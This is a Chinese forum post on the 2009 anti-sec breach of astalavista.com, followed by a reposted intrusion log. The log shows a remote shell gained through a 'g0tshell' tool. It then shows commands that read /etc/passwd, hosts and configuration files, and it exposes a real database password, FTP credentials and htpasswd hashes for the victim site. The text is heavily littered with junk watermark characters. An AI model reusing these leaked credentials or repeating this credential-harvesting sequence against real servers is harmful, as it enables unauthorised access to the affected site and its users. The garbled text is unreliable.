里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。6 R* ]* d1 S. k2 ^: c, [
" _4 a# @9 E7 c; W0 l
[root@front3 ~]# curl -I litespeedtech.com
1 v1 p3 B' @$ U$ D. Q" oHTTP/1.1 200 OK" s2 w" y# x% J+ Z" x, p& M( e
Date: Fri, 05 Jun 2009 22:54:51 GMT4 a* N& s8 J# w& ~ _
Server: LiteSpeed1 S' s9 w" |. _3 R) f! T9 S) h- C" j# r
3 j( ]% P1 G; [% d& z5 y# h
另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-
. K M! |% R; l- |, N( K! j- ?+ Q# J) ?( Y1 A
有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。
1 a6 }6 ]7 c9 J6 b! E7 H/ B4 H) A8 S9 \1 q" W) a0 h
) e) b; _" F; R0 f: I
/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \
4 T2 t! v" `! z2 w0 i' i/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \
- ?" r0 n+ x" e- B* A/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \
, Q' F# D, c+ {# X, z\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /
% N4 a1 Z- k7 R u3 a+ Q; | \/ \/ \/ \/ \/ \/ \/
/ r% V3 v* ~/ a+ l' L' x4 V The Hacking & Security Community- X3 k3 T, P2 Z) W$ M
[+] Founded in 1997 by a hacker computer enthusiast( G4 ?1 b/ I- Q0 q$ e
[-] Exposed in 2009 by anti-sec group0 E8 Z0 B& p* k) E( U q3 d# J$ h
& t" R* T3 [- L `5 H3 A! j
From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:
4 f# ^5 b" M0 G6 O3 ^, S4 @4 {; f>> 03. Who’s behind the site?' E6 x' I0 F0 P
>>
/ [! j/ Q, e5 X" W>> A team of security and IT professionals, and a countless number of contributors from all over the world.+ u5 Y2 q* _# L5 \0 S c
, Y6 j6 h8 g" u* [& t( [
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?, g0 t) x: k0 U
>>
+ y2 X/ ~" M' J) F>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and! C6 w5 l& S' R( C. B
military institutions." T8 C3 p6 m2 S4 b; l
>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.
- x$ o* s5 O8 h- I. a' ^% l& S; V
; M( m0 ^8 E4 Q2 a8 kWhy has Astalavista been targeted?
+ t2 Z. n* F, `% a1 y/ F4 B0 w/ w+ _* {' U5 u: j8 b' e2 G& J
Other than the fact that they are not doing any of this for the “community” but8 \$ y# w/ v) ~6 o6 N
for the money, they spread exploits for kids, claim to be a security community
% [8 e% E! w, Q5 M' B6 ?5 Q(with no real sense of security on their own servers), and they charge you $6.662 G" f# ^/ V; b: z/ ^
per months to access a dead forum with a directory filled with public releases
/ k$ M+ f5 b0 w& d0 X) wand outdated / broken services. f( E* N: N6 w5 |& r% x
8 p2 d( ^# v: e/ _6 I/ j2 p; H
We wanted to see how good that “team of security and IT professionals” really is.
6 t9 i; e. c: b. O
/ `5 Z6 H' n; |3 V/ JLet’s begin.2 Z5 Y: F- ]+ T* W9 }
2 U l7 {$ Y- X% l8 _anti-sec:~# ./g0tshell astalavista.com -p 80
9 N2 b* M& A/ I; v ~$ o2 M: a[+] Connecting to astalavista.com:80
5 \4 }: z8 p" A' Y: d[+] Grabbing banner…. H: y) L! s6 O. j* v
LiteSpeed
% u: m) D1 x4 E5 V2 r M. h% M[+] Injecting shellcode…
4 V7 a \/ V( A9 ?& r[-] Wait for it; O$ n7 O- O2 r+ v; ~& I8 i: G
8 k. y9 k8 A; Z1 q5 r/ p! w1 L[~] We g0tshell
$ z c: o7 x2 L6 d: Huname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux7 I: Q8 Y% I, D/ z0 W3 t
ID: uid=100(apache) gid=500(apache) groups=500(apache)
- F- t/ j9 S% c; v% _, s: l4 C% z; |$ w6 U8 C* @2 A: Q
sh-3.2$ cat /etc/passwd0 m/ g8 n* L+ k( j: N5 Y B
root:x:0:0:root:/root:/bin/bash$ c( A1 V5 i+ c! k" Y+ ^( O
bin:x:1:1:bin:/bin:/sbin/nologin2 X; r8 U. o/ L$ E) [9 A' d
daemon:x:2:2:daemon:/sbin:/sbin/nologin
! d( [+ ]" c) k# S( J/ Cadm:x:3:4:adm:/var/adm:/sbin/nologin
- h+ z; a& ]- ?lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin2 {' U- F( l$ q$ V* O; K' ?- A5 n
sync:x:5:0:sync:/sbin:/bin/sync
* [3 v( D2 m4 k: t) e9 f3 e9 _$ s0 Kshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown& x% z; v% B D; y, b9 C, l
halt:x:7:0:halt:/sbin:/sbin/halt
9 E3 B" E, N& ~mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
) [# `; ^& S6 ^% g$ nnews:x:9:13:news:/etc/news:
: f0 J4 A4 [. t8 o% _: W4 buucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
{ ` b6 k/ Moperator:x:11:0 perator:/root:/sbin/nologin
5 V- ^# i4 M. }games:x:12:100:games:/usr/games:/sbin/nologin
( m# `3 `% C- t$ G2 e# k# |gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
* x) d. _+ y" N6 h( D6 l- R8 p6 |ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin( R+ y! s/ \ c& G4 u; c, L. R1 p
nobody:x:99:99:Nobody:/:/sbin/nologin: n: f" _7 n2 _$ V* K
rpm:x:37:37::/var/lib/rpm:/sbin/nologin/ t5 c" {% A q# ~7 f. a
dbus:x:81:81:System message bus:/:/sbin/nologin
. |' }! j: R7 S5 _1 d9 ?# y# Cnscd:x:28:28:NSCD Daemon:/:/sbin/nologin6 D: e% s0 h; s8 W
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
, q4 g3 Z2 s, ksmmsp:x:51:51::/var/spool/mqueue:/sbin/nologin' \+ h8 K: j* u6 f; A- H
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin6 S- }: j5 q6 t$ V
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
% @$ I" |: {1 e7 w8 t* Rrpc:x:32:32 ortmapper RPC user:/:/sbin/nologin$ i) h- H+ s0 M3 L
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
& i( M" q8 p3 X# g* L! n' V9 Znfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
1 t k. B3 V; {sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin% K& _. u! |$ u" b6 D
pcap:x:77:77::/var/arpwatch:/sbin/nologin
1 M% @3 B. ]/ f: Y7 [1 Cnamed:x:25:25:Named:/var/named:/sbin/nologin
. l2 {* R* Y' \apache:x:100:500::/var/www:/bin/false' y3 v4 r5 ?1 _& [! t$ M' u& |
diradmin:x:101:101::/usr/local/directadmin:/bin/bash
T* N( ^* ]7 y [. @/ omysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
1 i S( \% r' a9 hwebapps:x:500:501::/var/www/html:/bin/bash, h* Q( @$ c1 V3 X
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
$ a) H" \6 K8 @. W# madmin:x:501:502::/home/admin:/bin/bash
$ z6 Y: C4 Z1 s' B" v$ Jjon:x:502:503::/home/jon:/bin/bash
/ n+ E, v! A* ~ N3 H6 wcom:x:503:504::/home/com:/bin/bash1 ?2 D* ^! t8 J" C9 e1 v6 \% n
ntp:x:38:38::/etc/ntp:/sbin/nologin
2 z9 X: }" u% kais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin
! F3 {% s! R* O$ |- m3 G# i, E- Y, s2 bastanet:x:504:505::/home/astanet:/bin/bash/ S( Y" d( k1 b$ M
avahi:x:70:70:Avahi daemon:/:/sbin/nologin/ Z2 n1 _- M0 s" p
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
; N c$ s+ f; {7 M
4 I8 {+ q) y/ {4 s: dsh-3.2$ cat /etc/hosts6 n A5 C9 q. p; L
# Do not remove the following line, or various programs
1 I' g ~" R' y- j& G% N# that require network functionality will fail.
9 g% c9 l7 K" ~: i127.0.0.1 localhost.localdomain localhost
" E0 Z9 R* `! ^6 G4 B* P& }5 o::1 localhost6.localdomain6 localhost6
- E. m, Z% @3 o% [3 c$ r, Q80.74.154.172 asta1.astalavistaserver.com5 d0 @# U/ a! J. m4 P
6 k6 K% P+ k7 \$ l
sh-3.2$ pwd* _% d; _' T% K. @! `3 ~# B6 I
/home/com/public_html
# H' J8 a0 N& H) f% U; |) M) e9 ]$ E5 n2 p3 n$ c8 r
sh-3.2$ ls -la
3 E D( @; ]- E- x+ ftotal 18460
# q8 M; @- X% c9 s3 Y9 H5 tdrwxr-xr-x 30 com apache 4096 May 28 17:06 .1 |$ [$ R) K2 H- l& }4 m, I
drwx–x–x 11 com com 4096 Jun 25 2008 ..3 p. d) i5 I& h8 Q
drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin! A0 ^2 p! u: L* O( p7 X! Q
drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache- [+ p1 G3 W' Y4 T" y: T2 @2 \5 M. ~
drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin% W( y3 L! M9 H) j5 n0 m
drwxrwxrwx 2 com com 4096 May 19 00:50 config# k- M0 }) p0 T9 ?
drwxr-xr-x 2 com com 4096 Mar 20 11:05 core
5 C$ @1 l7 b Adrwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules* D+ e# T- s1 C d
drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing# y; r6 K1 F3 X# a
drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo) q& e& J8 C+ d. s' K0 H, ]3 T' w+ `% u
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__
* J/ O+ B" O/ s; P, }3 {4 E-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php
5 P7 l( A( O2 u: T$ s+ Ndrwxr-xr-x 2 com com 4096 Sep 9 2008 dvd+ A9 g. ^: H; A
drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor8 _. G7 {- b: v. J
-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico" U$ k( X2 F F: o( W V0 ]9 }
drwxrwxrwx 2 com com 4096 Jun 4 08:00 feed
7 ?3 h3 K: P# ^$ d( Z6 w" {) ^# W3 ]-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess
" N# |* y/ [8 w9 X5 V1 N+ l# U-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak1 I: l3 B) x: W: J$ |9 t
-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak; Z% U: ]5 j* P8 {" O: i" I
drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool Q8 O A8 \6 y# X5 v# S) h, z- j
drwxrwxrwx 14 com com 4096 Feb 2 19:29 images
( ^/ @& O- j8 u( A3 X7 g( H4 J-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php; u% P" P* H& a) r0 l1 P
drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer) H# u9 L, t/ K( p
drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang
! L/ k7 C) `4 X3 o; \+ p: Udrwxr-xr-x 22 com com 4096 Feb 2 19:29 lib
# B/ t$ Y' P. wdrwxrwxrwx 12 com com 4096 Jun 2 07:47 media
" o6 I1 b3 z t( a# @$ Odrwxr-xr-x 8 com com 4096 May 11 12:48 modifications
. A. l! p% w4 J- y& ^3 K& rdrwxr-xr-x 34 com com 4096 May 28 16:30 modules
; P1 b- \- z3 P) w zdrwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin4 `0 Y# Y) u% j, U9 |- V/ J
drwxrwxr-x 22 com com 4096 May 28 17:06 _new- p6 W ^8 p% S) d1 M; }7 w! n, C
drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old
3 k* }, {. I! h5 x1 d: ldrwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy
$ K1 ^: R# \9 r5 Qdrwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy$ X- M3 z: ?* u- F/ U- i! l
-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt
1 ^+ x$ k( E6 N) E/ `" K* H-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml
5 K/ J, T% P9 O: U+ T7 U-rw-r–r– 1 com com 223 Mar 30 15:32 test.php
3 L" n% N. }" d) Adrwxrwxrwx 8 com com 4096 Mar 6 13:15 themes
8 s7 j g" o$ h- y! f+ L/ {drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp
* C# N7 F% W, D+ H8 I. Xdrwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam
2 g* E5 r$ c1 s, r* [# I- b& W
! O( A+ \7 Q$ B& P" l: N7 Vsh-3.2$ head -20 index.php8 Y) B- G( d: ^- I: t; p' E4 h$ ?( h
<?php
: E7 s+ e* s/ O+ E% i
4 k p1 v6 l9 o7 g1 E/**
+ u0 g4 ^- } i$ c/ L; g* The main page for the CMS
; |1 g- {; F/ R) r* @copyright CONTREXX CMS - COMVATION AG( c% l$ W2 t. Y/ d+ J, _
* @author Comvation Development Team
* @& L# U, N4 w7 J2 c* @version v1.0.9.10.1 stable$ g- w# k: l, T0 @ K
* @package contrexx
0 O! J: l0 g4 e- U% a& X/ U* @subpackage core
- V8 s) x2 J0 [; R; p% e* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage
3 P, ^" \% D& l! i* @since v0.0.0.0
, H# |3 t8 f. \% B2 a, O5 _+ G* @todo Capitalize all class names in project
6 N! O9 M# U' e7 y* @uses /config/configuration.php
! P4 Y8 l8 n' ]+ x* _0 \& m* @uses /config/settings.php
- Q1 B3 G7 \1 }8 [: [* @uses /config/version.php- y8 N; m+ h0 b
* @uses /core/API.php* s! c9 v0 B* ?
* @uses /core_modules/cache/index.class.php
) Z0 U$ i: s* B! c* @uses /core/error.class.php
4 g; C! ]1 F0 ]6 P+ R* @uses /core_modules/banner/index.class.php
( t# s8 z- J6 ^. j }: w8 U* @uses /core_modules/contact/index.class.php9 g7 R: i: M) s; `
0 b# G/ W+ D8 u2 \' l
sh-3.2$ cd config/
3 K0 x+ J3 Q' I2 } Ash-3.2$ ls -la6 l$ c5 h0 a# }- x6 `
total 327 b8 A, ^6 c+ E9 v) k+ P- a
drwxrwxrwx 2 com com 4096 May 19 00:50 .
0 x, R% j" w$ v# u- |* `2 xdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..8 Z9 J+ i7 y* S Y2 x
-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php/ m' g$ @, }* p( D6 t4 z+ Y
-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php
! m6 S& L2 o' m) {; c-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php
( y- E8 V8 T1 K-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php9 d+ ?- [+ x. A. ]1 Y$ K
& h3 F# F* q3 F6 Dsh-3.2$ cat configuration.php
; l! k. n/ i7 o9 g5 @[snip]
" f& {$ ~( H7 q; N; D" r$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost
0 E* I; y3 s2 m9 e* g7 K1 ~$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name
- J0 n' `# D1 M* z6 }$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix
% j( ?- A) O$ w7 l0 S4 \$ x$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username8 y' R% q: i4 X) ~0 V+ B/ w
$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password
) s& N/ D. e& K( y$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)$ r5 Q8 n ?: z* r1 n5 W
$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)# O8 z& U1 X, A5 _7 {
[snip]
) ?4 U" S7 `/ I) A, r; l8 o$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
7 q0 d: i& E) @1 ]4 o& m3 N$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode% V. k' j5 S+ f7 _4 O
$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost; c8 @/ @% l0 ] s5 K
$_FTPCONFIG['port'] = 21; // Ftp remote port1 y6 ~4 [( D! R
$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username0 |7 U# A' @) h) w
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password3 p$ L5 |2 L- q+ @6 } V: a
$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms
0 o& y5 C0 I4 x% d! g1 z$ V+ z2 N1 N4 M) L
sh-3.2$ cd ..
2 B* e) i$ c( z) Msh-3.2$ cd dvd/) l+ o& R: j) g9 t1 d2 R
sh-3.2$ ls -la
, @, T7 u* P. m; t0 M& Z6 l& w2 v- Ttotal 2913780& B& E8 i9 Y9 s0 Y- c0 V# g3 ]
drwxr-xr-x 2 com com 4096 Sep 9 2008 ./ X' R1 O& Y' ?+ D; F& O7 {
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..* U- q* j1 d8 c" S) v4 h0 R
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar) J1 Y: j0 q4 g9 Y) h' g
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar
9 c! [) Y# U4 R% [! S8 {, Z" g-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar
8 i( V/ s v* _4 }% U9 l-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess
' m, j! y& C/ y) w- Q/ Z
3 q" Q- w0 S; v0 A* ?# nsh-3.2$ cat .htaccess
2 _. f3 C9 f0 J. I9 q+ _: b1 bauthType Basic, S8 u; A b8 u
authName DVD
2 c3 @3 [8 J( U2 }( HauthUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd" t: g. n5 f+ i8 Q5 o" R
require valid-user; V# M9 X7 \: ~ f x) }. S( q6 z
# S; C6 L9 I5 a& ^" C" |
sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd; |# C& y6 h) N
DVDdownload:CRD8cuY6.MPT6
! p9 N8 V) M. s# o% `2 H+ D+ f P. Z" WDVDdownload2:CR8a36.wluFMg
" E7 D; A2 Y& x3 H, {9 O1 y
9 ^* X# k# N) m5 f6 E- Gsh-3.2$ cat test.php3 Y! `5 H3 n# }2 M" n
<?php- x7 I9 o0 E0 a* w" W: F' \
$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;
; ^. K6 j" |9 x7 n$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));
1 ^5 t9 u3 ?2 g! [/ {7 N- iecho $url;) Y" b: s3 O2 N1 u1 T
?>5 A1 Q- {% }+ \& m! u' \
, H4 x8 R4 z2 L: [; M- Z
sh-3.2$ cd modifications/
. y+ J: W/ `# D/ I# nsh-3.2$ ls -la* l; Y+ D8 J9 |7 h4 `
total 32+ W8 U; U6 u' ^7 J2 @
drwxr-xr-x 8 com com 4096 May 11 12:48 .
8 J* M2 ?2 L# F/ j: a6 jdrwxr-xr-x 30 com apache 4096 May 28 17:06 .. T# Z. Z7 B# U
drwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng) p4 N) F# r; W8 W$ K% a$ f
drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs8 G+ u% U- M/ u: A2 \
drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools
4 t* Y( J# n& |) T1 _' M: L9 \# b' Mdrwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc
4 V+ g+ r i+ Adrwxr-xr-x 2 com com 4096 Feb 2 19:33 search
# M/ D& O7 B3 odrwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp: I+ z# \. |' a9 Y
$ V% L- p6 @1 Xsh-3.2$ ls -R+ z/ l- F9 ^% j, |
.:% V' v, h S0 X/ d
com_avtng cronjobs onlinetools pjirc search _tmp! t. O, W$ p- e6 D9 R5 {/ k
. a9 W2 |0 P7 r/ A5 G) T, d5 t
./com_avtng:
5 M1 e- h7 a3 B, h' _avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts+ Z; |* k$ p- z' p$ K3 p B
9 U G& a3 Y- j# S0 I./com_avtng/scripts:& Y# {! ^) T6 s* N5 ]3 [
popunder.js. m1 t5 E. G4 |$ z* X) O
; h! z* X8 `6 Z* \, C2 k./cronjobs:" L, P$ r4 Q2 r F4 f, N' Y
exploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp: j2 D( k, i+ Z* B6 }
* B" U6 I7 K! h/ y6 I./cronjobs/tmp:( h ^. C9 I4 N6 m2 p0 M3 R/ S
contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv
' E. Q7 B0 o; j
2 e$ L; M; B$ n4 k0 @5 Z0 M0 Z; _$ x./onlinetools:4 l5 e7 g& B8 ]# i& Z9 A
index.php1 N# V7 y2 `* Q9 W0 t
( V2 U7 j( x2 T0 [& Y5 q6 f./pjirc:& j/ Q M0 |/ n, c
a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt
& p9 \- w/ K+ W) p E- T, eAppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt
3 O: W/ ?( V( {0 hbackground.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd
2 }" S) Q5 o( }: r8 X- N9 u/ d/ d _, c& P
./pjirc/img:
" S+ `$ I0 b; C* l# `) Jange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif, y0 w! J) ~' H& }
arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif
$ w! `% R* F* F, fverre-eau.gif
6 E6 n. r! n1 u g4 \ O( D& r; u$ Jargh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif
' |) h2 `+ L; w- p8 a' d' zverre-vin.gif6 l* ]7 T! t1 v, C0 u m
ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif/ V6 f5 m. N, O5 L( a/ k, k' |1 `
biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif7 b6 ^3 U: ?" I3 C) v
: L" ~! H+ v% p& Z) [9 J1 h' R9 O./pjirc/snd:' I4 k7 g& Z$ Q' \- v
bell2.au ding.au
& V$ e \' }) D" p+ S/ p2 K0 T B6 M' V0 F& N
./search:3 p) C( T7 G: E! c7 f- I6 S$ L5 j. ?1 j
searchEngines.php search.php/ C7 \$ y. [$ b% P
% J( \1 k* m$ V./_tmp:
: Z; n: \$ D: Y8 e3 D$ a: NdefaultPorts.php defaultPorts.txt5 e# N0 u& Q2 q9 K% Z7 x! ]: }
" n/ `8 ` f. A/ P3 ^sh-3.2$ cd cronjobs/8 O( S. h. w/ ]9 P. P" }5 |, k: a: ?
sh-3.2$ cat exploits.php2 Q% g; l2 l6 U( G7 a: w
[snip]5 G1 ]1 e3 q" }$ S6 M+ e/ \
$categories = array();8 [) \. ^. ]4 T' D
$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;# V6 E- N! i |6 W4 s1 p8 S) W5 R5 N1 A6 O
$expolits = file($milw0rmFile);; _( {) x1 P9 C3 z# m- X* z
$comExploits = array();# E K1 u, G" l& J, h# `) c3 M
[snip]
! q! R: j0 h3 _& T" b R// manage data8 i) n( B! I) C$ E
for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
% ~! b6 q$ D( _! s, Z7 Q
( u) x8 w- g t5 k) Q+ E // get path and title: W! [; T3 ~; ]
$expolits[$x] = trim($expolits[$x]);6 X- F3 S9 K& C9 k) x2 p6 g* L
$path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));' j6 ^) `& Q3 W
$title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);3 r& ?* @1 s1 C/ e# n5 i
% g, |; B9 R1 T' ^2 _" k; j
// check if file exists3 T" H2 S$ e o+ l; S& C" N
if (file_exists($path)) {
! K8 W+ u& H( Q! q3 ]: i* G U# ^/ |
$text = file_get_contents($path);1 ]6 }# a v; A% q) d6 X: F$ B2 ?
# E- M1 c0 M! Z; n- X; w/ R! }
// get content and date
+ ?% _# p ]4 Y/ _ //$text = htmlspecialchars($text, ENT_QUOTES);
) q- i8 c/ h5 I' d' v! H2 `6 u9 K $tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));
) A6 v3 j# ?3 B3 t* z ^ if ($tmptext != ”) {
2 p9 c3 m% D$ p1 E $text = $tmptext;. f% Z! v" @# o' V0 }# w! H
} else {
( [6 [4 \" U' D: g9 J d2 a $text = addslashes(htmlentities($text, ENT_QUOTES));- ~0 o5 e# _7 W2 U! Z7 P
}
8 M3 p* I9 P& c2 X' v; Q. m $date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));
( Z/ r6 ]% ]! C8 V: \6 O7 }' A $tmp = explode('-', $date);
/ m3 g8 l' a$ M9 j1 D $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
- c* V5 U0 w) S. O2 u' _+ | $cat = getCategory ($path);. C4 ^; U# A' \/ l7 N e
$ext = pathinfo(basename($path));; Q* \3 O7 T# q. c
$ext = $ext['extension'];: M( D! Q+ d+ l8 [6 G) q
$qStr = ”1 u+ e: q/ Q1 R( a3 `* g/ z4 j
SELECT `id`8 g: w. i9 g3 d. ^+ D5 t; r
FROM `contrexx_module_exploits`* j- a" _$ ^- \4 P) b8 C Z
WHERE `title` = ‘” . $title . “‘
: r1 T5 r1 V$ r/ E AND `date` = ‘” . $date . “‘" J) |: l) e7 \5 u q, Z3 T! s7 ?& u
“;
_* q8 y* ^6 x$ d( Y echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”; O( z8 ?( j; Y& z" h
$q = $_objDB->query($qStr); y3 d: U$ n' C3 G4 e- {
5 T" ~+ M3 r: `9 K
if ($q->numRows() == 0) {
/ _. K7 Z- U. M' t) a W
3 H3 Y. m$ ]6 y% ~- e5 e // prepare array
/ Z- Y1 q& l$ K; K $comExploits[$x]['date'] = $date;0 w7 G% B: M" F$ U4 C1 m$ Y
$comExploits[$x]['title'] = $title;- {& M! H. W `* S! V8 N; Q
$comExploits[$x]['author'] = ‘milw0rm’;4 E& X* c0 Z& X. d5 F
$comExploits[$x]['text'] = $text;* ~! K3 u& ~) G# M) ]/ y
$comExploits[$x]['source'] = $ext;
! ? K" M5 f+ q0 ` $comExploits[$x]['url1'] = ”;
6 ~8 O& H) v J- G* G3 W $comExploits[$x]['url2'] = ”;
* F8 A* E- |4 B $comExploits[$x]['catid'] = $cat;% n0 y6 l$ e. h1 z: k. Z
$comExploits[$x]['lang'] = ‘2′;1 {& i% o5 J/ ]2 V
$comExploits[$x]['userid'] = ‘12′;' z) B' w. ?7 G* u
$comExploits[$x]['startdate'] = ‘0000-00-00′;$ i0 ]' p. s3 f
$comExploits[$x]['enddate'] = ‘0000-00-00′;; v/ k* n" C0 J( x- K, v$ R+ T9 S- }& B
$comExploits[$x]['status'] = ‘1′;/ ] t' Q1 f$ u' |# C
$comExploits[$x]['changelog'] = $date;
6 V0 q' j I* s7 Q( M3 S5 ]. y- F( |$ ?
}
# `+ @9 m) U0 [" A[snip]
5 s8 U, i. Y3 \2 M7 n $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>9 k) Q3 Y* r5 I
<rss version=”2.0″>: W. I1 r8 A8 ]5 K V; b
<channel>
